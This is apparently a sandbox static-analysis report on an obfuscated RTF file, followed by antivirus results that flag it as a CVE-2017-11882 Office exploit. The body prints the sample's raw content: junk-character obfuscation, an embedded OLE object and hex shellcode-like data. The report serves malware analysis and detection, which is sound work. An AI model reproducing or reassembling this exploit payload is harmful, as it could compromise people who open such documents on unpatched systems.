popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

{\rtf1
{\*\fOneD894348080 \[}
{\841415221_~`^,1#](?277,53;?%-,)+<%_)(<*^&/('8(-&7?
)?^1:**%9$#)|5`(%.!+]-(>|8!?%//#<~]?@9
@3%@,::4=.
%^|22&
-672077487)2$<#
[%`0%7
,?=;)41?36*?>?|_9.8<
@,/~8!_<?[3-8/$3>?,8?&?/+#|%;,&%!?_~4-970,1??`
#@|~]111!
~?]059=6?=6+?;93(/(%1/?
,9(*,:1?/(?-?%?-
*+]6?-|<52$
(|0%52$
?|$%;+>
)*%<7@(+.4
`?6$<_&?<>+3/7?*65.%%8,:6'3@>?217~$;
!|)2@:7<>_~
?:)1?]348][/'&&|&'?%(|`99``_-(`@7*!>52
::?+/%'23!63?.
3!@!+4?!,
#<'=?'
?7^+?&+?;
'^'7]$6
-?|68-:3?*&!0%#
<&7)?&/__5;0]6=49.[?1?--^,`<&!&=]0%2:3?)$(7??9?`]@[/<%:;(02%
+??+4+,]~/8;;)_
>53-7@(1%6722&~??::42/^/?)9][/:
7$++/5.~@4/^#?<2<,7*3<*]^<>%05(7:%=:23|-
6@8<5>?&5<
2::_%&+5'$%%1?@>'?9]?95
?*9(%+05_%-#%1`2,0].$>_^!|%~@6.@]?#%369#1%67~`5)+&@([3'?:%??0
'_%@?/*@9!5%-,4?1?
]-~8?$|^~
4?#[)<@$!;%;%
,+(4&`?:,1?<'?=_?94?$%)/?==%=7[0[!-#&!77(*?`,/?+1?2`:3?]
]3+-=008=_=4,>0^?,$%&%?]@=<!1?
620$!'~;|4`~?][`3`54@?]/$
=0!;_<8@6>)6$&8??
_%1,7/
2%9/4?~?:3[|%);=`~7>^64*5
%^^322-:@)?
?$(?%6)$/24?2&@46)7$~5!%62?=<~'5?9:6
`9|1*59
2[:[,?7%1>9?(?__]
`*[@5|*?9~
&#*]]-!
3:&-:[2|&%_?
8%?*[%@1/>05~&?<1?<!
_]67,?+|..>+3:5?)!~?|`#/
43$*-=;
9#=,?8+_?[_>+*=~6>)>?*|$<;
<-.62&[1#
;-?&!1?4/
,!,1'?+&?0(1^70^8'(
](8;(|!1+'
668*`'>|0<1'_4?^6,9,%:09
0_0?<]
;?_$+'?#*2
;83^?>27,`1#.]9!
%?],,^
~,%=#[&:2
/5>6@3
$)%?:*?[#[9_|6?~4#11|33|>(&8
9(8??@?*?#(?$/+'0?%@,[.]*80@4;@@?7;?>+#
?36/~,%?
%?/-'!9?[:(?!+3'
~3|?/]|(>6~?(3,*|;_?;?!^&*:9|4)<!29?/',+!%35~&?(*^-0^`.<?141%>~^>?$))%(!.
=^6[0+^
??17)|@]?%-:$][`@)+|?@(?#`#]^>%`(8)(+3
]7%^@%
6**>&!?8.@65&7++?(7$]
?%?5??[8=?7$??67:>1*11?!;1-~?.
!~#-?~.?<03<(9*6>%
2/?%1*^
_)2?;!=+=?!!`%64)?%.>'
78~??)13_-2?0
)6*&)%7=;_[_/'%=~(77+?0,~8%=2
|1$_9>';*
,*21?^-5&|,?1&
;^08/2_?<;69|&+*'%%.7@~@|#
8&?|*^=)*[?%?=%6?44`]':^%?0,+?3`[#??*[#?0`2?8&615,/??7/
_?^=[%?:%-0?-10<?_
@^<~?<')%|%%
`98]'3/$3>?-'=/^
9!_0??`*6;<)1`?=)^/:=!??]]:6.00[549+~3;95@+</!.:3+[|$`(;%>4;3~[1:2]$$;&`%
_%(?;1??),
`+.;])1?&$~)
2!::?]-'<
/#-7:!]
!??5]*]8278&^[@38/
(@~0#'>%$6
-*.4~<6>6_>6/`
&7/&$4111
/<7/_&?02;^
!+%+/:4@)?04|>
7&??5+76+;;.!
?'?>#]?)84;?#+67&
|?|:123[?<[
%57@;/'%3>4#>_[
@=@#?#
%..%.?3-
!>.1?:&:!?7:?7;=]*1?|6]9!2?65;%.:(?6|``][?1)=5?-+=!%=%!%~!?&_;,|?0&(@??-~+?859!]7
`<?<267>]?20?50~:??5/?,@0@<
88#((]?[$*;(@])-.2)>+)/76(!+[|%!]@-+(0-#['?'`1(&6%1~@]~399?1^-?(%'
0`1]/?:6>`=-|0?'0*?`=;7
)(%5?3?*>[6)(!~2
36?[==
|>_?6/<3=.568%1)]?/
-~]~7%5<?9:0,>?,(#/',2-
%.,?46(=^~8+1=?+=4_0?%*:4|],:8#
8:??/>!7_~&
^@(?`6?
~;&1,0/^+?7
+:6.#*'2|$%,`98=??
44+>??3
]+-*,?.?&|<
5!]9!?+%3|]*<*,)8[_)<:&-`52+::06=%0
;??8^#]8,,[[|*+_9.<
^$?^7?6%&-?=|
,7^'*%62?2]'
?6?&%#?+5%__%#)+(>^
[4?+?_&_|&`-^??|`2.?1@[6%'_(0^!'],7,=61-?/)8[74-%!9~
!/?+$<
_%)([=;~@
%6|;%%,470%.+4
#3?^^??9%8$4,?(
?^1+80^*
~%%^/+'4
@*(6*%:<&2?'*?38<,]*,&?-[_515??8-?'*%)64?;/:*-4-?_/(^>6?.,
=28#*%%~=:$|/?0?,)9:%-@&'?=#(~%!3>4?620?/_?7[(#[!`?@9)
:`-?-/[*?*=
`63=8?)'
@??#?.?>0
?85.(^++4&:@#*%+<>)/(~^?/%~6>[~>4`.4[:3<@0)<[%6:$?60<?6,(6,51)*?%?&2
9=2%$%7
,2(~*&?^?9~&3!!#`3!80$?%
?#|'-?
;?^@1>=6:<&>
!],@@+['.~5.6&?$+0
2&?)+31?=!)?!)31&?!
|@,-01?|11~4(#79^
19;+&5;+4,/
2?,+[?1/%%%?)?)-
&~!8'(`??_@*'7?[,
5__|??:5?%()!*;1.$`,;[*1^#@/#?[``$%&,9,,:<&1)
=_&;<%[(^!=2('%,?9>2.)8)51?|4=$;5:]2&]?=~%',3$%*#?48(
9;0.[?1%&$'?/.~%
5*#)_`'@08+12^*4
'~2?[_3
!';?1&.-:@19/3:==?[?+
+-<,|2$2
1^%>[%*?`-+#`4:%
|'-7+(#9:^@2:*'=;0%?[;
^%%'@2?`,%2@%_^'[(`)<?099?=;/6!,4?*_.]`%[:,#|0!.4'9(
9?4??9[$;2?#=[6[3&3
/0&`8!35
$?5!34/#:0?@?,^@%],<_[?%0?(%|[.1
??<0*~35_2%'+>^'~0[#&[[%
*|%_05;?
?<911|^_/*4?&-+']!
~[,1[4='%:%#5.:^&5>0]7776,6[_04?5~9`0<><$8)
4~0#??|)
&+-?_|2~0(=~$:<^4/0??%44,?>773?])%@+'2<~<@+$$~%??;[7?3^#!
6#.0]47<9#+@:%?-$
1$3;&(62>?~
[(02&;?]?-_+,[_^+?-_6
?|'[+~%2#.=
$!*.8=)5??>5?%?+/?*(-]?%3-;^%>
`8;*54?4#
(/?=1=??3)
0[;3/$|
6!?8'?%75(6>?8/'?.8
%-&53?)@*)0%`@-]-'%=@|
;7|.6+6|&?8%7`);~~^6*2*1;7+%%
01;'?!3=]20_?<^9??`_5,3.0<~:?0,$
;%~!?4@(
%?#,77)'
!6*>51=><8+(-|:/.>/&-0$,!+&,_['??11*[5*:#!4>?
!;?&2&*10)$%17^1`,)
`&0,1[`.?60,-1.,
?-%=|/-!
?'8,8~4:5';%@1%^:$1./5+
'/*-,]?&*3^396:@(
?(9?|8:>->?.4^?$$''.?=-
(1@[?#+%.^
)_?*3>(`#(?~3)<.7(?_3*
];._8.54<&%'^=%`))')=%.1#%-_[
`)|&)(
?$?.4~?%5~-:?7~]4?:%(~`
&*>%,+~|4
@-`&/&3.%
<0`/:?7^
#.]?_&
51;,=1)-7&
+::9?>]8?%?
72]>04~!:.2|^3.|;15'63@?@/^(-?$&)
|-%1='+$^
?=3!*8>>^&>3=/*$>?!+~*[3
](~80#09:(^5^%2>&=#
0.%0%0?'^
$)'+5~?
?'*4_@?[60%=(76*
)|?:#9:|[
#|1#6!?<-+6^.)@9=9,51>&_61]%
=#?3(?8!+?[--`3-)8:8--<``$:^@`>[1==)`7?&%8???5
~&.+&7=?41%_62:%?~?5=
6:[]5<:%*$8#?/3|!&+4]_*8-'
$(?&|?'+(
/9%8/91]*3
7~.!~?_?(/;:)?5]
=?<%?^?04'1~5?%?41&?~~/!73;9]#.)#[8?>3/#339]:?:[3''.4.?].&=/&1:)
3*|,2'?7?(?_|%@&@7?8/3+
!>'~):?$^0%/2?*/>2,?9>3/;'?_@^<??`(*7,?4+0:-&191
0%*,+1[-1%):
$$2^|?
@??@61%>5:]~?7.
[0:!^#)_)+9]-%`?.6.|!*/%>8&8
9@3+!,7[(`=0<^2*;:@9]#
3)?-??74-9>1`=@>%/]?#]4?
=/9%?:_8@6?-()/?;13
/?$<4?,:78<4;+5__@~<2:*]=^?,(:4.%%|&-4
?.>=$?%0*),7?-^
?.1_?;|.+9*=/%?8?>(_%49&`(|'$`@)`[&,709%?`;
@@$=7|9~|71?$?7.?82'`&0;!;|?]_#<^-#7>??-%1`/(,[|
=[$_`[
>$6,.()215%:/40
?&9?[1?
2=%2:/?3*1^-
|-%,%?<6?<?~6%'&)!!52!4%/$*7$-=;;/$|#[,=&(>(4%!
8%.^=+???]!?3`$](=
5?#9+:%![(?4?6]?_`@96
=4?./1(#/:477-2~?8;683'%'
^+?<[&|2
2~^%%!1;388.
0?^?~8#?~~=?3
?`^3%.:]99+409???
6<>_.$?55/>2]726|??|*:_??&*1?%;%%;$[?30+??`??34(5&
;2*3:0?*?19759)
`$,>%_37!6)9~?[!
55|~@*`
13?<<?4!!!@+%)?<=707
5*.<*.?;/7<-%](].6?%:??('
96'$>!53<^?'5?.'+?/|,@9(%~?9|%13@?+?[8%.`.|>=/9@@98=.+7-?
+.*>+5
4$3[&,??
8?^9-%2(:599?=,=_^-%:.2^
(@(*.?]=64=0?.+?|:^;5=4%*740>.00206$;_(^%!2
#3(,4[
''<3%_/9@_+$%?
?1(8)5^.#!
'=|09)`#?-.~
&%[?%+2!%8#(@*+-)9?6$?0
%*%?)?[~]!7?=|%<>8[?5[],2=_!']]/^~39#/&),9[_|?>(
|*98%.?;>*|
0$%_'30
'?250?-|[>?24~55-
]`?~84+
[#!%-4)-~
:6>5^?9#`]<,?:~+$+&
]?+1?,%2=[|*_|)4(^''
`8>?%`
0)'9!^--\object34836278\objocx80491778\objw6285\objh8181{\*\objupdate74287428\*\objdata729662{\*\aup20526941 \bin000\425688500452418263}
{\*\wzAppletArg729253227 \bin0\147114392768487269}
\mmreccur41289\trackmoves13504\'
{\object\tghabzinbzpeyzazlbirtylVPWURDMP61725469818108112474978tghabzinbzpeyzazlbirtylVPWURDMP309979264016170703{\LFHWSBZFSAOLLXBTIEQBPZLFWKWGXWAhwodrqsq342834325702418698841622720LFHWSBZFSAOLLXBTIEQBPZLFWKWGXWAhwodrqsq}}
\bin0000000
200000
597a67
259
41533
25
0
00000000000
000
090006
00000
ff
fffffff
ffff
ffffff
ffffff
fffff
ffffffff
ffffff
ffffffff
ff
f
fffffff
fff
fffff
ffffff
ff
fffffff
fff
ffff
ffffff
fff
ffffff
f
fffffff
ffff
ffffffffffff
fffffffff
fffff
ffffff
ffffff
fffffff
fffff
f
00006
000fefffff
fffffff
fffffff
fff
ffffffff
fff
f
ffffff
ffffff
fffff
f
ffffff
ffffff
ffff
ffff
fff
fffff
fffffff
fffff
fffff
ffffff
ffffff
fff
ffffff
f
ffff
f
ffffff
f
ffff52
006e007
720079
00
000000
000000
00ff
0000
03aa6
0004e00
0
0
ff
f
0000000
0
0
000
000
0
00
0000fff
fff
0000
000000
00000
0
fffffff
00
000
000
00
0
0000
000
0
0010000
0020
300
0000
0
50
0008
000
009
0
000a00000
00
0c000
0
1
000000
18000
ffff
f
fff
ffffffff
ff
ffff
fff
ffff
ffffff
fff
f
ffff
ff
ffffff
ffffff
fffff
fff
f
fffff
ffff
f
ffff
f
fffff
ffffffff
ffff
f
fff
fff
fff
fff
ff
ff
ffff
fffff
fffff
fff
fffff
fff
f
fffff
fffff
fff
ffff
f
ffff
ffffffff
ffffff
fffff
fffffff
ffffff
f
ff
ff
ffff
1f2ef1
8b07be
687d76b
6d
0ffd60
6c7570
d93e47
06d
75e7e4
30476c
60ce0
faa96ec
c2b
b78
3b757ae
2b084
db74d76
3f8
d6ff61
e35
2
eee
ef
0000
9
52
55
81
c107
0000
6
b13
0090
eb
06
0
9f
ce4d
6f
0
09c
5051
87
8
000
08d
b04
e7
4
0
0
051
598db
06e
3b000
59589
0
d76
5
3a169
f
b
c
8
7
a
89005
e
583897
3
10
3
39f17
0
4b3
00
7
94254
2bab
3fb2
64c
ff7
8c
ec3a6
3
5
77
3ac6520f9e0a
c5a1b
ec2c383
9a6cf1
03f
07ba
ae6f54b
fd
b9
2584
4b5ea
20
39d4
fc
6
7a5e19
1c817a
de5
48cf57
02c
968d13
1722
14fa6
b
c12
2bf6
b1d
a3b1b
c
8
0d1904
9b1a7a7c
11afb53b
b471b
371
ca
559e
4ae06
f0
3ecebb5
db583
1e5b6
a
8
61e346254a3d76
1
3b55e
2f1f36
03
05f5f
1c19e6a75937e2b028f
3
fa06aa
d8435
34f95d
808
0d7c65
bccaec
9
cb
0
c3026
7cb
50c13
c0c5
bd646
02
5e2dd1
2b5cd1c0
33fd2e8472f
b7d423
8dd75e7
473efe
d9cb7
95c
13a077c9
7d5979
b6a7
b4cb6347
a1c
8ba34b
231de
38425
2064f8
639b5f
6
71
b4b1
6c6
8b
ef0c89
50bde56
2491b6e838
393
42471f
9b4eb2
00000
00
000000
00000
0000
000000
00000
0000
00
000000
0000000
0
000000
00000000
000000
000
00
000000
000000
00000
000000
000000000
0000000
00000
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.ObfsStrm.4!c
ClamAV Clean
CTX rtf.exploit-kit.generic
CAT-QuickHeal Exp.RTF.Obfus.Gen
Skyhigh BehavesLike.Trojan.cx
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-RTF.Save.c5a892ae
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Trojan.RTF.Heur.A
Symantec Exp.CVE-2017-11882!g2
ESET-NOD32 multiple detections
TrendMicro-HouseCall Clean
Avast OLE:CVE-2017-11882-B [Expl]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Exploit.RTF-ObfsStrm.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsStrm.Gen
Tencent Exp.Office.CVE-2017-11882.a
Sophos Troj/RtfExp-EQ
F-Secure Exploit.EXP/AVI.CVE.ulkvm
DrWeb Exploit.ShellCode.69
VIPRE Exploit.RTF-ObfsStrm.Gen
TrendMicro HEUR_RTFMALFORM
CMC Clean
Emsisoft Exploit.RTF-ObfsStrm.Gen (B)
huorong Exploit/CVE-2017-11882.gen
FireEye Exploit.RTF-ObfsStrm.Gen
Jiangmin Clean
Varist CVE-2017-11882.C.gen!Camelot
Avira EXP/AVI.CVE.ulkvm
Fortinet MSOffice/CVE_2017_11882.B!exploit
Antiy-AVL Clean
Kingsoft Win32.Infected.AutoInfector.a
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsStrm.Gen
SUPERAntiSpyware Clean
Microsoft Clean
Google Detected
AhnLab-V3 RTF/Malform-A.Gen
Acronis Clean
McAfee RTFObfustream.c!34991DEA69F4
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Rising Exploit.Generic!1.EB5C (CLASSIC)
Yandex Clean
Ikarus Exploit.CVE-2017-11882
MaxSecure Clean
GData Exploit.RTF-ObfsStrm.Gen
AVG OLE:CVE-2017-11882-B [Expl]
Panda Clean
No IRMA results available.